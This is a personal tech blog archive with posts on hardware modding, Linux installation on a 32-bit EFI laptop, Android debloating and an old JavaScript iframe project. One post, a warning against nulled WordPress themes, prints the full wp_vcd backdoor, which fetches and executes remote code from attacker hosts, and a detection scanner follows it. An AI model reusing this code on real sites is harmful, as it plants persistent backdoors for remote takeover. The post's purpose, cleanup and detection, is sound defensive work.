Saturday, May 25, 2019

Project Boost the Beast: i7 3770K Delid & Installation of Noctua DH-14

Another project of mine: this time we will delid an i7 3770K, apply new thermal paste, replace the original IHS with a custom 100% copper IHS, and install a Noctua DH-14.

What we will use: (Disable your adblock to see the items that I've used and their links)

Temperature comparison without any overclock: (SpeedStep is enabled, that's why there's a difference in frequency when idling)





Sunday, March 3, 2019

Microsoft Movie Maker on Windows 7 / 8 / 10



Missing the good old simple yet functional Movie Maker?

Download the Microsoft Essentials package from the link below and install it. If you get any errors about a missing .dll, copy the appropriate version into the Movie Maker installation path and it will fix it.

http://www.mediafire.com/file/09hnwobyy426o36/MovieMaker_Installation.rar/file

EINNOV IPCAMERA VIDEO MODE SETTINGS



If you have the same IP camera, you will notice that when you try to change the video settings to better configure your RTSP/RTMP stream, any change you make in video mode won't be saved.

A little digging revealed that a variable called nn was never declared, which makes it impossible to save any changes: every attempt ends in the execution error "Undeclared Var".

I tried to contact the manufacturer through the seller, but they couldn't provide me with a fix (a firmware update), so all I got was a refund.

Sunday, December 16, 2018

WordPress Theme Examination

"Cracked", "nulled", "hacked" and "download for free" are keywords/terms you should always avoid.
An examination of a NULLED THEME revealed some pretty NASTY and definitely FREE functions.
Before we proceed, let's make up a small story. We will use the name John for a guy who is a website developer and "builds" WordPress websites for clients.

Another imaginary guy, whom we will name Frank, will play the role of the client in this example.

So let's summarize:
John creates websites, Frank wants a website built, so he hires John.
John's goal is to make as much profit as possible.
So after discussing with the client and sealing the deal, John decides to reduce his costs and increase his profit even more by downloading a cracked theme instead of buying it from a legitimate source. [And of course without letting the client know anything about it.]

DON'T BE LIKE JOHN.

Results:
Malware-infected websites, blacklisted, compromised, etc.


Tips for clients like Frank:
If you decide to go with a WordPress theme and you are not 100% sure that the developer won't follow the same path John did in the previous example, just BUY the WordPress theme yourself and provide him with the .zip sources.

Below you will see the malware from John's EPIC work, which basically infected all templates (functions.php and core.php). I manually removed all instances of the script (functions.php, wp-core.php, wp-tmp.php, wp-vcd.php), checked all the recently modified files on the whole server and finally ran a scan with AMSB.

Malware Details: https://github.com/rakshitshah94/wordpress-wp-vcd-malware-attack-solution

An infected sample of functions.php file:

<?php
if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == '10948a2cd002f84e83693c76f362cd1e'))
{
$div_code_name="wp_vcd";
switch ($_REQUEST['action'])
{
case 'change_domain';
if (isset($_REQUEST['newdomain']))
{

if (!empty($_REQUEST['newdomain']))
{
                                                                           if ($file = @file_get_contents(__FILE__))
                                                                    {
                                                                                                 if(preg_match_all('/\$tmpcontent = @file_get_contents\("http:\/\/(.*)\/code\.php/i',$file,$matcholddomain))
                                                                                                             {

                                                                           $file = preg_replace('/'.$matcholddomain[1][0].'/i',$_REQUEST['newdomain'], $file);
                                                                           @file_put_contents(__FILE__, $file);
                           print "true";
                                                                                                             }


                                                                    }
}
}
break;

case 'change_code';
if (isset($_REQUEST['newcode']))
{

if (!empty($_REQUEST['newcode']))
{
                                                                           if ($file = @file_get_contents(__FILE__))
                                                                    {
                                                                                                 if(preg_match_all('/\/\/\$start_wp_theme_tmp([\s\S]*)\/\/\$end_wp_theme_tmp/i',$file,$matcholdcode))
                                                                                                             {

                                                                           $file = str_replace($matcholdcode[1][0], stripslashes($_REQUEST['newcode']), $file);
                                                                           @file_put_contents(__FILE__, $file);
                           print "true";
                                                                                                             }


                                                                    }
}
}
break;

default: print "ERROR_WP_ACTION WP_V_CD WP_CD";
}

die("");
}

$div_code_name = "wp_vcd";
$funcfile      = __FILE__;
if(!function_exists('theme_temp_setup')) {
    $path = $_SERVER['HTTP_HOST'] . $_SERVER[REQUEST_URI];
    if (stripos($_SERVER['REQUEST_URI'], 'wp-cron.php') == false && stripos($_SERVER['REQUEST_URI'], 'xmlrpc.php') == false) {
        
        function file_get_contents_tcurl($url)
        {
            $ch = curl_init();
            curl_setopt($ch, CURLOPT_AUTOREFERER, TRUE);
            curl_setopt($ch, CURLOPT_HEADER, 0);
            curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
            curl_setopt($ch, CURLOPT_URL, $url);
            curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE);
            $data = curl_exec($ch);
            curl_close($ch);
            return $data;
        }
        
        function theme_temp_setup($phpCode)
        {
            $tmpfname = tempnam(sys_get_temp_dir(), "theme_temp_setup");
            $handle   = fopen($tmpfname, "w+");
           if( fwrite($handle, "<?php\n" . $phpCode))
   {
   }
else
{
$tmpfname = tempnam('./', "theme_temp_setup");
            $handle   = fopen($tmpfname, "w+");
fwrite($handle, "<?php\n" . $phpCode);
}
fclose($handle);
            include $tmpfname;
            unlink($tmpfname);
            return get_defined_vars();
        }
        

$wp_auth_key='2967d26a5e5850cadd9eced25d5465fa';
        if (($tmpcontent = @file_get_contents("http://www.satots.com/code.php") OR $tmpcontent = @file_get_contents_tcurl("http://www.satots.com/code.php")) AND stripos($tmpcontent, $wp_auth_key) !== false) {

            if (stripos($tmpcontent, $wp_auth_key) !== false) {
                extract(theme_temp_setup($tmpcontent));
                @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);
                
                if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
                    @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
                    if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
                        @file_put_contents('wp-tmp.php', $tmpcontent);
                    }
                }
                
            }
        }
        
        
        elseif ($tmpcontent = @file_get_contents("http://www.satots.pw/code.php")  AND stripos($tmpcontent, $wp_auth_key) !== false ) {

if (stripos($tmpcontent, $wp_auth_key) !== false) {
                extract(theme_temp_setup($tmpcontent));
                @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);
                
                if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
                    @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
                    if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
                        @file_put_contents('wp-tmp.php', $tmpcontent);
                    }
                }
                
            }
        } 

        elseif ($tmpcontent = @file_get_contents("http://www.satots.top/code.php")  AND stripos($tmpcontent, $wp_auth_key) !== false ) {

if (stripos($tmpcontent, $wp_auth_key) !== false) {
                extract(theme_temp_setup($tmpcontent));
                @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);
                
                if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
                    @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
                    if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
                        @file_put_contents('wp-tmp.php', $tmpcontent);
                    }
                }
                
            }
        }
elseif ($tmpcontent = @file_get_contents(ABSPATH . 'wp-includes/wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
            extract(theme_temp_setup($tmpcontent));
           
        } elseif ($tmpcontent = @file_get_contents(get_template_directory() . '/wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
            extract(theme_temp_setup($tmpcontent)); 

        } elseif ($tmpcontent = @file_get_contents('wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
            extract(theme_temp_setup($tmpcontent)); 

        } 
        
        
        
        
        
    }
}
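
A triage scan built from the markers visible in the sample above, as an added example that is not part of the original post or of the linked repository: it walks a WordPress tree and flags PHP files that carry the wp_vcd tag, the theme_temp_setup loader, a self-rewriting file_put_contents(__FILE__ ...) call, a remote /code.php fetch or the password-gated $_REQUEST check, plus any file named wp-vcd.php or wp-tmp.php. The function names, the marker labels and the constructed test tree (with the placeholder host c2.example.invalid) are assumptions made for illustration.

```python
import re
import tempfile
from pathlib import Path

# File names the post reports removing during cleanup.
DROP_FILE_NAMES = {"wp-vcd.php", "wp-tmp.php"}

Q = rb"[\"']"  # either PHP quote style

# Patterns derived from the infected functions.php sample shown above.
MARKERS = {
    "wp_vcd_tag": re.compile(rb"\$div_code_name\s*=\s*" + Q + rb"wp_vcd" + Q),
    "temp_include_loader": re.compile(rb"function\s+theme_temp_setup\s*\("),
    "self_rewrite": re.compile(rb"file_put_contents\s*\(\s*__FILE__"),
    "remote_code_fetch": re.compile(
        rb"file_get_contents(?:_tcurl)?\s*\(\s*" + Q + rb"https?://[^\"']+/code\.php",
        re.I),
    "request_password_gate": re.compile(
        rb"\$_REQUEST\[" + Q + rb"password" + Q + rb"\]\s*==\s*" + Q
        + rb"[0-9a-f]{32}" + Q, re.I),
}


def scan_file(path):
    """Return the sorted list of reasons a single PHP file looks infected."""
    reasons = []
    if path.name.lower() in DROP_FILE_NAMES:
        reasons.append("drop_file_name")
    try:
        data = path.read_bytes()
    except OSError:
        return sorted(reasons + ["unreadable"])
    reasons += [name for name, rx in MARKERS.items() if rx.search(data)]
    return sorted(reasons)


def scan_tree(root):
    """Walk a WordPress tree and map relative path -> reasons for flagged files."""
    root = Path(root)
    findings = {}
    for path in sorted(root.rglob("*.php")):
        if path.is_file():
            reasons = scan_file(path)
            if reasons:
                findings[path.relative_to(root).as_posix()] = reasons
    return findings


def build_constructed_site(root):
    """Create a small constructed tree: a clean theme, an infected one, a drop file."""
    root = Path(root)
    clean = root / "wp-content/themes/clean/functions.php"
    bad = root / "wp-content/themes/nulled/functions.php"
    drop = root / "wp-includes/wp-vcd.php"
    for p in (clean, bad, drop):
        p.parent.mkdir(parents=True, exist_ok=True)
    clean.write_text("<?php\nadd_action('init', 'my_theme_setup');\n")
    bad.write_text(  # constructed, inert lines that mimic the sample's markers
        "<?php\n$div_code_name = \"wp_vcd\";\n"
        "function theme_temp_setup($phpCode) { /* body omitted */ }\n"
        "$tmpcontent = @file_get_contents(\"http://c2.example.invalid/code.php\");\n"
    )
    drop.write_text("<?php // constructed placeholder\n")
    return root


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        for rel, reasons in scan_tree(build_constructed_site(tmp)).items():
            print(f"{rel}: {', '.join(reasons)}")
```

A hit is a reason to inspect the file by hand; a clean result does not prove the site is clean, because the sample can rewrite its own marked block through the change_code action.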

Sunday, October 28, 2018

Why I love what I do

# Project Name: MultiPager

Well, I like to treat my projects/code/scripts/ideas as something a little bit more than just simple lines of text.
Every bit of thinking energy I spend on even a typical [HELLO WORLD] hides something behind it that is way more than 34 chars. System.out.println("Hello World");

That is why I'm writing this: while I was making a backup of my files, I came across a source file (created 8 years ago) with the following code, and all of a sudden memories, feelings and a weird smile filled me. That source code had something more than just lines. Something deeper than spaghetti code. It was a sum-up of an old idea with all of its pros & cons, expectations and memories of the whole process.
That is why I love what I do, and that is why every day in my continuous learning journey I'm enjoying every part of it.
Every bit and byte.

This is the interpretation of a small project I've had in mind since high school, which I've decided to post online as a blog post rather than a repo on GitHub, to preserve it as a memory.
Some KEY variables:
My high-school time dates back to 2009 => So if we put it in an equation:
NOW - THEN = 9 years ago.
Since then lots of things have obviously changed in terms of RAM, processing power and multiple-monitor setups, so the idea behind it, applied to today's standards, doesn't really have any use.
BUT back then we were rocking (at least I was) one VGA monitor and between 128-512MB of RAM. So that basically sums up when and why the idea was born.

Functionality:
To be able to access multiple websites and view them at the same time in one window. No tabs, no other windows. All the webpages inside one ~ (1024X768 was the most used monitor resolution)
That's really what got me into looking at how to create objects dynamically via JavaScript (in this scenario iframes and buttons, in order to load the desired URL in a small defined iframe inside my parent page).

Why the ship had sunk before it was ever created:

Well, creating objects dynamically was a very interesting task, but then I came across the Cross-Origin policy, which basically made me lose any interest in bringing the whole idea to life. I had the whole structure and some of the core functions implemented, but in the end the journey was a great experience even though I didn't reach the destination.

Last but not least, it made me smile. An abandoned idea, 8 years later, gave me a moment, a flashback, and that's the value of it. It cannot be defined. A worthless, priceless moment of joy.

<script language="JavaScript" type="text/javascript">
    var id = 0;
        <!-- Zoom Function-->
        function sliderChange(val)
        {
            var zoomlvl = val;
            if (val<80)
            {
                zoomlvl = 80;
            }

            // Use Ajax post to send the adjusted value to PHP or MySQL storage
            document.getElementById('sliderStatus').innerHTML = val + "%";
            document.body.style.zoom = zoomlvl + "%";
        }
    function frameremove()
    {
        var elem2 = document.getElementById('id');
        elem2.parentNode.removeChild(elem2)
        
        var elem3 = document.getElementById('id');
        elem3.parentNode.removeChild(elem3)
    }
    
    function makeFrame()
    {   //////////////////////////////////////////////////////////
        //Get the value from txtbox
        var webinput = document.getElementById('inputurl').value;
        /////////////////////////////////////////////////////////
        
        /////////////////////////////////////////////////////////
        //Create the iframe element
        ifrm = document.createElement("IFRAME");
        /////////////////////////////////////////////////////////
        
        //Error page that shows up on blank searches
        if (!webinput)
        {
            webinput = "test.html";
            ifrm.setAttribute("src",webinput);
            ifrm.setAttribute("id","id");
        }
        else //Normal Search Function
        {   
            //PROXY SERVER
            //ifrm.setAttribute("src","http://proxy2974.my-addr.org/myaddrproxy.php/http://" + webinput);
            ifrm.setAttribute("src",webinput);
            ifrm.setAttribute("id","id");
        }
        
        //////////////////////////////////////
        // IFRAME WIDTH & HEIGHT //
        /////////////////////////////////////
        ifrm.style.width = 600+"px";
        ifrm.style.height = 480+"px";
        var counter = 0;
        counter++;
        /////////////////////////////////////

        var beforeitem = document.getElementById('social');
        var main = document.getElementById('main');
        main.insertBefore(ifrm, main.beforeitem);
        
        ///////////////////////////////////////////////////////
        //Creation of the remove button
     btnremove = document.createElement("INPUT");
        btnremove.setAttribute("type","submit");
        btnremove.setAttribute("value","X");        
        btnremove.setAttribute("onClick","frameremove();");
        btnremove.setAttribute("id","id");
        btnremove.setAttribute("class","button");
        id = id+1;
        main.insertBefore(btnremove, main.beforeitem);
        document.getElementById('inputurl').value = ""
        ///////////////////////////////////////////////////////
    }
    
    function erase(html_id)
    {
        var elem = document.getElementById('btnadd');
        elem.parentNode.removeChild(elem)
        var main = document.getElementById('main');
        main.appendChild(elem);
    }

Saturday, July 14, 2018

[Tutorial]Linux x64 on Baytrail 32bit EFI(Lenovo Ideapad100s-11iby)

In this tutorial, after a pretty "tough" series of trial and error, I'll show you step by step how I managed to get my Lenovo Ideapad 100S-11IBY laptop to successfully boot and install Linux Mint 19 XFCE.

The story behind it:
First things first: low-spec laptop + Windows 10 (bloatware party) = slowness.
Also, this laptop comes with a pre-installed 32bit version of Windows 10 and a 32bit UEFI BIOS, making it a real pain to install an x64 OS and take advantage of the CPU's x64 support.

Laptop Specs:


    CPU: 1.33 GHz quad-core Intel Atom Z3735F (64bit support - hence the x64bit OS)
    Graphics: Intel HD Graphics (Bay Trail)
    RAM: 2GB
    Storage: 32GB eMMC
    Screen: 11.6-inch, 1,366 x 768 matte TN LED display
    Connectivity: 802.11n Wi-Fi, Bluetooth 4.0 (Low Energy)
    Weight: 2.2 pounds
    Size: 11.5 x 7.95 x 0.69 inches (W X H X D)

    What we will need:
    1) USB Stick
    2) Rufus
    3) x64 Linux Distro
    4) bootia32.efi

    Let's start:
    1) Burn the image to your USB stick using Rufus, then copy the bootia32.efi file to the "/EFI/BOOT" directory on the USB stick.
    2) Disable Secure Boot in your BIOS.
    3) Boot from your USB stick (on the Lenovo Ideapad 100S you have to press FN+F12).
    4) Select the first option to boot the live distro.
    5) From the live Linux desktop, select the icon to install the OS to your hard drive.
    6) At the last step it will fail, showing the following message

    7) Press OK and the installation will exit. Find and open the terminal from the desktop environment, type blkid and write down the name of your ext4 partition.
    8) After that, restart your system.

    9) Boot again from the live USB; on the first option, instead of pressing Enter, press "C" on your keyboard to launch the GRUB command line.
    10) From there we need to jumpstart and point to our installation partition.


    set root=(hd?,?)
    HINT: The TAB key is your friend for autocompletion.

    Now we need to find the vmlinuz.efi file. Use Tab to see where your file is; I'll give you the common locations to search below. (It could also be vmlinuz.efi instead of vmlinuz.)

    linux /casper/vmlinuz root=/dev/YOURPARTITIONNAME 
    or
    linux /boot/vmlinuz root=/dev/YOURPARTITIONNAME 
    or
    linux /vmlinuz root=/dev/YOURPARTITIONNAME 

    Now let's locate initrd:
    initrd /casper/initrd.lz 
    or
    initrd /boot/initrd.lz

    And after that type "boot"
    boot

    So on your screen you should have these 4 instructions
    set root=(hd1,2)  
    linux /casper/vmlinuz root=/dev/mmcblk1p2
    initrd /casper/initrd.lz
    boot
    

    Your Linux distro will boot up; now we need to configure our 32bit GRUB loader and we are done.

    11) Open up your terminal and type the following:
    sudo apt-get update
    sudo apt-get install grub-efi-ia32
    sudo update-grub2
    12) That's all, folks. The OS is now ready; time to sort out some issues/bugs.

Sudden freezing bug: This is a power management bug on Bay Trail CPUs. There is a patch, which I haven't really tried out yet (Google c6off+c7on.sh).

Instead of the patch, I've used the following:

We need to pass the parameter "intel_idle_max=1" to GRUB. To do that, go to /etc/default and edit the file called grub. Find the parameter GRUB_CMDLINE_LINUX_DEFAULT and, inside the quotes, add one space at the end of the current value followed by "intel_idle_max=1", e.g.:
GRUB_CMDLINE_LINUX_DEFAULT="quiet splash intel_idle_max=1"
Save your file and then update GRUB from the terminal with "sudo update-grub".

Disable HDMI sound (Known to cause issues):

Go to /etc/modprobe.d/ and create a conf file called "blacklist_snd_hdmi_lpe_audio.conf",
then paste the following line inside it, without quotes: "blacklist snd_hdmi_lpe_audio"

Drivers for Audio Built-In Speakers & Mic:

Find your sound card version by opening a terminal and typing aplay -l
Go to https://github.com/plbossart/UCM and download the appropriate drivers, then copy the whole folder to /usr/share/alsa/ucm

Note: If your driver folder contains a file called asound.state, copy it to /var/lib/alsa

Keyboard/Trackpad Session Freeze Bug:


This bug occurred per session, and with some restarts or shutdowns everything worked until you shut down your laptop again. The steps below completely fixed the issue for me and now the keyboard always works. Open a terminal and type: sudo apt-get install libinput*

Power Management / Charging Issue / (Overheating):
sudo add-apt-repository ppa:linrunner/tlp
sudo apt-get update
sudo apt-get install tlp tlp-rdw

If you have a thinkpad you will also need the following line:
sudo apt-get install tp-smapi-dkms acpi-call-dkms

2 Network Icons showing up on taskbar:
From the main menu select Preferences > Default applications for LXSession. In the window that then appears, click on the Autostart tab, find the network entry, uncheck it, log off, log in, and then recheck it.

Some small tweaks for swap:

Tweaks for laptops with 2GB of RAM or less
a. First check your current swappiness value.
Type in the terminal: cat /proc/sys/vm/swappiness
Press Enter. The result will probably be 60.
b. To change the swappiness to a more sensible setting,
type in the terminal: xed admin:///etc/sysctl.conf
Press Enter. Note that you'll be asked twice for your password.
Now a text file opens.
Scroll to the bottom of that text file and add your swappiness parameter to override the default:
# Decrease swap usage to a more reasonable level
vm.swappiness=10
c. Save and close the text file. Then reboot your computer.
d. After the reboot, check the new swappiness setting: launch a terminal window.
Type: cat /proc/sys/vm/swappiness
Press Enter. Now it should be 10.

                                                    HAPPY LINUX-ING


Friday, July 6, 2018

[Tutorial] Debloat - Safe android services to disable or remove.


Once again a self-explanatory title, so I'll get directly to the point.
Here's my safe-to-remove list, all self-tested.

Instructions:
You can disable the following packages directly from your phone, or download and install the Debloater by Gatesjunior, with the adb drivers of course.



Samsung Galaxy Alpha G850F on Rooted Stock 5.0.1 Lollipop:
  1. AccuweatherPhone2014_S_LMR_HD.apk (com.sec.android.widgetapp.ap.hero.accuweather)
  2. Books.apk (com.google.android.apps.books)
  3. Drive.apk (com.google.android.apps.docs)
  4. Dropbox.apk (com.dropbox.android)
  5. Flipboard.apk (flipboard.app)
  6. GalaxyApps_3xh.apk (com.sec.android.app.samsungapps)
  7. Hangouts.apk (com.google.android.talk)
  8. Magicshot_HD_A5.apk (com.arcsoft.magicshotstudio)
  9. Music2.apk (com.google.android.music)
  10. Newsstand.apk (com.google.android.apps.magazines)
  11. PhotoStudio_HD_K.apk (com.sec.android.mimage.photoretouching)
  12. PlusOne.apk (com.google.android.apps.plus)
  13. SStudio_HD_K.apk (com.sec.android.mimage.sstudio)
  14. Talkback.apk (com.google.android.marvin.talkback)
  15. Velvet.apk (com.google.android.googlequicksearchbox)
  16. VideoEditor_Lite_S.apk (com.sec.android.app.storycam)
  17. Videos.apk (com.google.android.videos)
  18. WeatherDaemon2014_LMR.apk (com.sec.android.daemonapp)
  19. Youtube.apk (com.google.android.youtube)